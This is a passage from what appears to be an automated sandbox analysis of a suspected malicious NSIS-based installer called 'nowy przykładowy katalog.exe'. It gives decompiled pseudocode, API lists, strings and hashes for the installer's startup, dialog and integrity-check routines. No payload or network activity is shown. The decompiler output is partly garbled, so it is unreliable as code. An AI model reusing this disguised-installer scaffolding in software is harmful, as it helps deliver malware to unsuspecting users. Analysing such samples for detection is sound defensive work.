                                                  0x00403ba6
                                                  0x004039d4
                                                  0x004039d4
                                                  0x004039d8
                                                  0x004039dd
                                                  0x004039ec
                                                  0x004039ec
                                                  0x004039f5
                                                  0x004039fe
                                                  0x00403a09
                                                  0x00403a09
                                                  0x00403a15
                                                  0x00403a31
                                                  0x00403a34
                                                  0x00403a47
                                                  0x00403a4d
                                                  0x00403af0
                                                  0x00000000
                                                  0x00403af9
                                                  0x00403a53
                                                  0x00403a60
                                                  0x00403a62
                                                  0x00403a64
                                                  0x00403a83
                                                  0x00403a83
                                                  0x00403a86
                                                  0x00403a8b
                                                  0x00403a8e
                                                  0x00403a9e
                                                  0x00403a9f
                                                  0x00403aa1
                                                  0x00403ad7
                                                  0x00403aea
                                                  0x00000000
                                                  0x00403aea
                                                  0x00403aa3
                                                  0x00403aa9
                                                  0x00403ac2
                                                  0x00403ac7
                                                  0x00403ac9
                                                  0x00000000
                                                  0x00000000
                                                  0x00403acb
                                                  0x00403ab7
                                                  0x00403ab7
                                                  0x00403ab9
                                                  0x00403ab9
                                                  0x00000000
                                                  0x00403ab9
                                                  0x00403aac
                                                  0x00403ab1
                                                  0x00000000
                                                  0x00403ab1
                                                  0x00403a90
                                                  0x00403a96
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a98
                                                  0x00000000
                                                  0x00403a98
                                                  0x00403a88
                                                  0x00000000
                                                  0x00403a88
                                                  0x00403a6e
                                                  0x00403a75
                                                  0x00403a7b
                                                  0x00403a7d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403a7d
                                                  0x00403a39
                                                  0x00000000
                                                  0x00403a17
                                                  0x00403a1d
                                                  0x00403a27
                                                  0x00403e2d
                                                  0x00403e33
                                                  0x00403e35
                                                  0x00403e3b
                                                  0x00403e40
                                                  0x00403e46
                                                  0x00403e46
                                                  0x00403e3b
                                                  0x00403e50
                                                  0x00000000
                                                  0x00403e50
                                                  0x00403a15

                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                  • ShowWindow.USER32(?), ref: 00403A09
                                                  • DestroyWindow.USER32 ref: 00403A1D
                                                  • SetWindowLongA.USER32 ref: 00403A39
                                                  • GetDlgItem.USER32 ref: 00403A5A
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                  • GetDlgItem.USER32 ref: 00403B23
                                                  • GetDlgItem.USER32 ref: 00403B2D
                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                  • GetDlgItem.USER32 ref: 00403C3E
                                                  • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                  • EnableWindow.USER32(?,?), ref: 00403C71
                                                  • EnableWindow.USER32(?,?), ref: 00403C8C
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                  • EnableMenuItem.USER32 ref: 00403CA9
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                  • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,egkwshqw Setup), ref: 00403CFD
                                                  • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                  • String ID: egkwshqw Setup
                                                  • API String ID: 4050669955-2990416480
                                                  • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                  • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                  • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                  • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040361A, Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x79ee58
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405B25("1033",  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x7a2864
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x72
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                  0x00403620
                                                  0x00403629
                                                  0x00403630
                                                  0x00403632
                                                  0x00403646
                                                  0x00403658
                                                  0x00403662
                                                  0x00403667
                                                  0x0040366d
                                                  0x00403680
                                                  0x00403680
                                                  0x0040368b
                                                  0x00403634
                                                  0x0040363f
                                                  0x0040363f
                                                  0x00403690
                                                  0x00403695
                                                  0x0040369a
                                                  0x004036a3
                                                  0x004036a8
                                                  0x004036b9
                                                  0x00403740
                                                  0x00403748
                                                  0x00403751
                                                  0x00403751
                                                  0x00403767
                                                  0x0040376d
                                                  0x0040377b
                                                  0x0040380a
                                                  0x00403812
                                                  0x0040381c
                                                  0x00403821
                                                  0x00403827
                                                  0x004038b1
                                                  0x004038b6
                                                  0x004038b8
                                                  0x004038d4
                                                  0x00000000
                                                  0x004038d4
                                                  0x004038ba
                                                  0x004038c0
                                                  0x004038c8
                                                  0x004038c8
                                                  0x00000000
                                                  0x004038c0
                                                  0x00403835
                                                  0x00403840
                                                  0x00403845
                                                  0x00403847
                                                  0x0040384e
                                                  0x0040384e
                                                  0x00403859
                                                  0x00403861
                                                  0x00403863
                                                  0x00403865
                                                  0x0040386e
                                                  0x00403871
                                                  0x00403877
                                                  0x00403877
                                                  0x0040387d
                                                  0x00403896
                                                  0x004038a7
                                                  0x00000000
                                                  0x004038ac
                                                  0x00403814
                                                  0x00403816
                                                  0x00000000
                                                  0x00403781
                                                  0x00403781
                                                  0x00403787
                                                  0x00403791
                                                  0x00403799
                                                  0x004037a3
                                                  0x004037a9
                                                  0x004037b7
                                                  0x004038d9
                                                  0x004038d9
                                                  0x00000000
                                                  0x004038d9
                                                  0x004037bd
                                                  0x004037c6
                                                  0x00403805
                                                  0x00000000
                                                  0x00403805
                                                  0x004036bf
                                                  0x004036bf
                                                  0x004036c4
                                                  0x00000000
                                                  0x00000000
                                                  0x004036c9
                                                  0x004036ce
                                                  0x004036de
                                                  0x004036e3
                                                  0x004036ea
                                                  0x00000000
                                                  0x00000000
                                                  0x004036ee
                                                  0x004036f0
                                                  0x004036fd
                                                  0x004036fd
                                                  0x00403705
                                                  0x0040370b
                                                  0x00403733
                                                  0x0040373b
                                                  0x00000000
                                                  0x0040371d
                                                  0x0040371e
                                                  0x00403727
                                                  0x0040372d
                                                  0x0040372e
                                                  0x00000000
                                                  0x0040372e
                                                  0x00403729
                                                  0x0040372b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040372b
                                                  0x0040370b

                                                  APIs
                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                  • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000), ref: 0040368B
                                                  • lstrlenA.KERNEL32(rtrystwqtc,?,?,?,rtrystwqtc,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                  • lstrcmpiA.KERNEL32(?,.exe,rtrystwqtc,?,?,?,rtrystwqtc,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                                  • GetFileAttributesA.KERNEL32(rtrystwqtc), ref: 0040371E
                                                  • LoadImageA.USER32 ref: 00403767
                                                    • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                  • RegisterClassA.USER32 ref: 004037AE
                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                  • CreateWindowExA.USER32 ref: 004037FF
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                  • GetClassInfoA.USER32 ref: 00403861
                                                  • GetClassInfoA.USER32 ref: 0040386E
                                                  • RegisterClassA.USER32 ref: 00403877
                                                  • DialogBoxParamA.USER32 ref: 00403896
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Xy$_Nb$d(z$rtrystwqtc
                                                  • API String ID: 1975747703-990386603
                                                  • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                  • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                  • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                  • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\engineer\\Desktop";
				E00405BC7("C:\\Users\\engineer\\Desktop", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0x27c00
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0x27c00
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E8E();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0x27c00
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0x67196
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50; // 0x6719a
						if(__eflags < 0) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                  0x00402c5d
                                                  0x00402c60
                                                  0x00402c63
                                                  0x00402c66
                                                  0x00402c6c
                                                  0x00402c7d
                                                  0x00402c82
                                                  0x00402c95
                                                  0x00402c9a
                                                  0x00402c9d
                                                  0x00402ca3
                                                  0x00000000
                                                  0x00402ca5
                                                  0x00402cb0
                                                  0x00402cb6
                                                  0x00402cc7
                                                  0x00402cce
                                                  0x00402cd4
                                                  0x00402cd6
                                                  0x00402cdb
                                                  0x00402cdd
                                                  0x00402dca
                                                  0x00402dcc
                                                  0x00402dd1
                                                  0x00402dd8
                                                  0x00000000
                                                  0x00000000
                                                  0x00402dda
                                                  0x00402ddd
                                                  0x00402e01
                                                  0x00402e06
                                                  0x00402e0c
                                                  0x00402e0e
                                                  0x00402e17
                                                  0x00402e1c
                                                  0x00402e1f
                                                  0x00402e20
                                                  0x00402e21
                                                  0x00402e23
                                                  0x00402e28
                                                  0x00402e2b
                                                  0x00402e3e
                                                  0x00402e42
                                                  0x00402e4a
                                                  0x00402e4f
                                                  0x00402e51
                                                  0x00402e51
                                                  0x00402e51
                                                  0x00402e59
                                                  0x00402e59
                                                  0x00402e5c
                                                  0x00402e5d
                                                  0x00402e5d
                                                  0x00402e60
                                                  0x00402e62
                                                  0x00402e62
                                                  0x00402e62
                                                  0x00402e6c
                                                  0x00402e72
                                                  0x00402e80
                                                  0x00402e85
                                                  0x00000000
                                                  0x00402e85
                                                  0x00000000
                                                  0x00402e2b
                                                  0x00402de5
                                                  0x00402df0
                                                  0x00402df5
                                                  0x00402df7
                                                  0x00000000
                                                  0x00000000
                                                  0x00402dfc
                                                  0x00402dff
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ce3
                                                  0x00402ce8
                                                  0x00402ce8
                                                  0x00402ced
                                                  0x00402cf1
                                                  0x00402cf8
                                                  0x00402cfd
                                                  0x00402cff
                                                  0x00402d01
                                                  0x00402d01
                                                  0x00402d05
                                                  0x00402d0a
                                                  0x00402d0c
                                                  0x00402e36
                                                  0x00402e2d
                                                  0x00000000
                                                  0x00402e2d
                                                  0x00402d12
                                                  0x00402d19
                                                  0x00402d95
                                                  0x00402d99
                                                  0x00402d9d
                                                  0x00402da2
                                                  0x00000000
                                                  0x00402d99
                                                  0x00402d22
                                                  0x00402d27
                                                  0x00402d2a
                                                  0x00402d2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d31
                                                  0x00402d38
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d3a
                                                  0x00402d41
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d43
                                                  0x00402d4a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d4c
                                                  0x00402d53
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d55
                                                  0x00402d5b
                                                  0x00402d64
                                                  0x00402d6a
                                                  0x00402d6d
                                                  0x00402d6f
                                                  0x00402d75
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d7b
                                                  0x00402d7f
                                                  0x00402d87
                                                  0x00402d87
                                                  0x00402d8a
                                                  0x00402d8d
                                                  0x00402d8f
                                                  0x00402d91
                                                  0x00402d91
                                                  0x00000000
                                                  0x00402d8f
                                                  0x00402d81
                                                  0x00402d85
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402da3
                                                  0x00402da3
                                                  0x00402da9
                                                  0x00402db5
                                                  0x00402db5
                                                  0x00402db8
                                                  0x00402dbe
                                                  0x00402dc0
                                                  0x00402dc0
                                                  0x00402dc8
                                                  0x00402dc8
                                                  0x00000000
                                                  0x00402dc8

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402C66
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,00000400), ref: 00402C82
                                                    • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 004058A2
                                                    • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 00402CCE
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                  • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                  • Inst, xrefs: 00402D3A
                                                  • Xy, xrefs: 00402E42
                                                  • Null, xrefs: 00402D4C
                                                  • Error launching installer, xrefs: 00402CA5
                                                  • C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                  • "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" , xrefs: 00402C55
                                                  • soft, xrefs: 00402D43
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$Xy$soft
                                                  • API String ID: 4283519449-2338875126
                                                  • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                  • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                  • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                  • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402E8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 174fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0x29045
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
